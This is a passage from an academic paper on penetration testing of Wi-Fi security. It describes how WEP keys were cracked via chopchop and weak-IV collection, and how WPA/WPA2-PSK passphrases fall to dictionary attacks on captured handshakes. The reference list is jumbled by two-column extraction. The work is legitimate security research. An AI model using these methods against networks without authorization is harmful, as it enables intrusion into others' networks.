WEP was designed for confidentiality, not authorization: it encrypts with the RC4 stream cipher under the WEP key and uses a CRC-32 checksum for integrity. WEP is vulnerable to attack because of its IV mechanism: the 24-bit IV space is exhausted within a few hours on a busy network, after which IVs are duplicated. The chopchop attack was used to recover a keystream without the WEP secret key. The chopchop method, developed by KoreK, exploits a vulnerability in the WEP protocol itself (the linear ICV) rather than a weakness in the RC4 algorithm. Without knowing the secret key, the attacker was able to capture and decrypt an encrypted packet, obtaining its keystream and plaintext. A chosen plaintext XORed with the keystream produces a forged ciphertext that the AP accepts, and injecting it repeatedly makes the AP generate more packets, each with a new IV. The IVs are transmitted in clear text and concatenated with the secret shared key to form the RC4 key, so packets with weak IVs leak information about the key; as more weak IVs are collected, the chance of cracking the WEP key increases. With 51326 IVs collected, the WEP key was successfully cracked, as shown in figure 18.

The outcome shows that WEP is vulnerable to attack. The WEP key can be cracked without any active client connected to the network, and, without knowing the WEP key, the plaintext and keystream of a packet can be obtained and used to crack the key.

Figure 18: WEP Key Successfully cracked

4.2 Analysis on Vulnerabilities in IEEE 802.11 WPA/WPA2-PSK Encryption Protocol
WPA/WPA2-PSK is vulnerable to attack because the four-way handshake is transmitted unencrypted (plaintext). All the parameters used in the mutual authentication (PMK and PTK generation) between the supplicant and the authenticator (AP) are known to an attacker except the passphrase. The derivation formulae for the PMK and PTK are:

PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)
PTK = Function(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)

The captured four-way handshake was analyzed with

Wireshark. The first message of the EAPOL handshake was transmitted from the AP to the supplicant and comprises a 256-bit random number, the ANonce, for PTK generation at the supplicant. The AP MAC address and the ANonce are visible, as highlighted in figure 19.

Figure 19: First Message of the WPA Four-way Handshake (ANonce and AP MAC Address)

The supplicant sends the second message as a reply to the first EAPOL handshake message, carrying its SNonce in plain text to the authenticator together with a MIC, a cryptographic hash (HMAC-SHA1) computed under the key derived on the supplicant side, as highlighted in figure 20. The attacker computes a MIC for each candidate PTK, as the AP would, and compares it with the MIC captured in the second message of the EAPOL handshake. If they are equal, the attacker has derived the same PTK and the passphrase is cracked.

Figure 20: Second Message of the WPA Four-way Handshake (SNonce, MIC and Client MAC Address)

The passphrase of the WPA/WPA2-PSK network was successfully obtained, as shown in figure 21, which displays the PMK, the PTK and the MIC computed with the cryptographic hash algorithm (HMAC-SHA1). The outcome of this study implies that WPA/WPA2-PSK is vulnerable to dictionary attack: an attacker can crack WPA/WPA2-PSK if the passphrase exists in the dictionary or wordlist.

Figure 21: Successful Crack of WPA/WPA2-PSK Passphrase

5. CONCLUSION
In assessing the security of IEEE 802.11 WLAN security protocols using penetration testing, it was shown that WEP and WPA/WPA2-PSK are vulnerable to attack. In WEP, the entire IV space is 24 bits, which is exhausted within a short time and causes IVs to repeat as more packets are generated. Cracking the WEP key depends on generating more packets with weak IVs; once enough weak IVs are collected, the key is cracked. The CRC-32 checksum (ICV) is meant to verify data integrity by preventing alteration of data packets in transit, but it is an unkeyed linear function of the plaintext rather than of the ciphertext, so an attacker who modifies the ciphertext can correct the ICV to match, and the ICV fails to achieve its aim. In the case of WPA/WPA2-PSK, the four-way handshake between the client and the AP is easily captured by an attacker, and candidate PMKs and PTKs can be checked against it, since cracking depends only on the captured four-way handshake. WPA/WPA2-PSK will be cracked only if the passphrase exists in the attacker's wordlist or dictionary file, because only then can the PMK and PTK be determined.

6. REFERENCES
[1] Lee P., Stewart D. and Calugar-Pop C. (2014). Technology, Media & Telecommunications Predictions. London: Deloitte report, pp. 1-60.
[2] Waliullah Md., Moniruzzaman A. B. M. and Sadekur Rahman Md. (2015). An Experimental Study Analysis of Security Attacks at IEEE 802.11 Wireless Local Area Network. International Journal of Future Generation Communication and Networking, vol. 10, no. 4, pp. 9-18.
[3] Ola G. (2013). Penetration Testing on a Wireless Network Using Backtrack 5. Turku University of Applied Sciences.
[4] Chen Z., Guo S., Zheng K. and Li H. (2009). Research on man-in-the-middle denial of service attack in SIP VoIP. Networks Security, Wireless Communications and Trusted Computing (NSWCTC), vol. 2, pp. 263-266, Apr. 2009.
[5] Appiah J. K. (2014). Network and Systems Security Assessment using penetration testing in a university environment: The case of Central University College. Kwame Nkrumah University of Science and Technology, Kumasi.
[6] National Institute of Standards and Technology (NIST) (2008). Technical Guide to Information Security Testing and Assessment, Special Publication 800-115, Gaithersburg.

[7] Praveen L., Ravi S. Y., and Keshava R. M. (2011). Bio-Inspired Network. Liverpool John Moores
Securing IEEE 802.11g WLAN Using OPENVPN and University.
Its Impact Analysis. International Journal of Network
Security & Its Applications (IJNSA), Vol.3, No.6, [23] Kurup L., Shah V. and Shah D., (2014). Comparative
November 2011. Study of Attacks on Security Protocols. International
Journal of Advanced Research in Computer Engineering
[8] Kropeit T. (2015), Don’t Trust Open Hotspots: Wi-Fi & Technology (IJARCET) Volume 3 Issue 8, August
Hacker Detection and Privacy Protection via 2014
Smartphone. Ruhr-Universitat Bochum.
[24] Fluhrer S., Mantin I. and Shamir A., (2001). Weaknesses
[9] Forouzan B., (2008). Data Communications & in the Key Scheduling Algorithm of RC4. Eighth Annual
Networking. 4th edition. New York: McGraw-Hil Workshop on Selected Areas in Cryptography, August
2001.
[10] L’ubomir Z., (2012). Security of Wi-Fi Networks.
Comenius University, Bratislava [25] Hulin K., Locke C., Mealey P., and Pham A., (2010).
“Analysis of wireless security vulnerabilities, attacks,
[11] Bilger J., Cosand H., Singh N. and Xavier J. (2005). and methods of protection”. Information Security
Security and Legal Implications of Wireless Networks, Semester Project, 2010.
Protocols, and Devices
[26] [Robyns P., (2014). Wireless Network Privacy. Hasselt
[12] Shweta T., Pratim K., Sumedh K, and Aniket G., (2013). University
“Study of Vulnerabilities of Wlan Security Protocols,”
Journal, Dep. Comput. Eng. Fr. C. Rodrigues Inst. [27] Zarch S. H. M., Jalilzadeh F., and Yazdanivaghef M.,
Technol. Vashi, Navi Mumbai, no. September, pp. 109– (2012). Encryption as an Impressive Instrumentation in
112, 2013 Decrease Wireless WAN Vulnerabilities. International
Journal of Scientific and Research Publications, Volume
[13] Memon A. Q., Raza A. H. and Iqbal S., (2010). WLAN 2, Issue 12, December 2012, ISSN 2250-3153
Security. Halmstad University School of Information
Science, Computer and Electrical Engineering. Technical [28] Papaleo, G. (2006). Wireless Network Intrusion
report, IDE1013, April 2010. Detection System: Implementation and Architectural
Issues: Universita degli Studi di Genova.
[14] Kumkar V., Tiwari A., Tiwari P., Gupta A. and Shrawne
S., (2012). Vulnerabilities of Wireless Security protocols [29] Ciampa M. D., (2012). Security+ Guide to Network
(WEP and WPA2). International Journal of Advanced Security Fundamentals. Course Technology, Cengage
Research in Computer Engineering & Technology. Learning.
Volume 1, Issue 2, April 2012
[30] Laverty D., (n.d.). WPA versus 802.11i (WPA2): How
[15] Park T., Wang H., Cho M., Shin K. G., (2002). Enhanced your Choice Affects your Wireless Network Security.
Wired Equivalent Privacy for IEEE 802.11 Wireless http://www.openxtra.co.uk/articles/wpa-vs-80211i.php
LANs: The University of Michigan
[31] Mkubulo D., (2007). Analysis of Wi-Fi Security
[16] Intercop Net Labs, (2002). "What's Wrong with WEP?" Protocols and Authentication Delay. The Florida State
Retrieved from University, FAMU-FSU College of Engineering
http://www.opus1.com/www/whitepapers/whatswrongwi
thwep.pdf (Accessed on May 10, 2018) [32] Vanhoef M., and Piessens F., (2017). Key Reinstallation
Attacks: Forcing Nonce Reuse in WPA2. imec-DistriNet,
[17] Borisov N., Goldberg I., and Wagner D., (2001). KU Leuven
Security of the WEP algorithm Retrieved from
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html [33] Ramachandran, V. (2011), BackTrack 5 Wireless
(Accessed on April 24, 2018) Penetration Testing, Master Bleeding Edge Wireless
Testing Techniques with BackTrack 5: Packt Publishing,
[18] Kiemele L., (2011). Wireless Network Security. Birmingham UK
V00154530
[34] Noh J., Kim J., and Cho S., (2018). Secure
[19] Zahur Y. and Yang T., (2004). “Wireless LAN Security Authentication and Four-Way Handshake Scheme for
and Laboratory Designs”. University of Houston Clear Protected Individual Communication in Public Wi-Fi
Lake CCSC, Journal of Computing Sciences in Colleges, Networks. Digital Object Identifier 10.1109/IEEE
vol. 19, no. 3, January 2004, pp. 44-60. ACCESS.2018.2809614
[20] Bulbul H. I., Batmaz I. and Ozel M., (2008). Wireless [35] Kaplanis C., (2015). Detection and prevention of Man in
Network Security: Comparison of WEP (Wired the Middle attacks in Wi-Fi Technology
Equivalent Privacy) Mechanism, WPA (Wi-Fi Protected
Access) and RSN (Robust Security Network) Security [36] Stimpson T., Liu L., Zhang J., Hill R., Liu W. and Zhan
Protocols. Gazi University Y. (2012). “Assessment of Security and Vulnerability of
Home Wireless Networks”, IEEE 9th International
[21] Gupta S., (2012). Wireless Network Security Protocols- Conference on Fuzzy Systems and Knowledge
A Comparative Study, IJETAE, 2012 Discovery, Chongqing, China, 29-31 May, 2012, pp.
2133-2137.
[22] Alselwi A., (2015). Wireless Security Protocol in DNA

IJCATM : www.ijcaonline.org 33

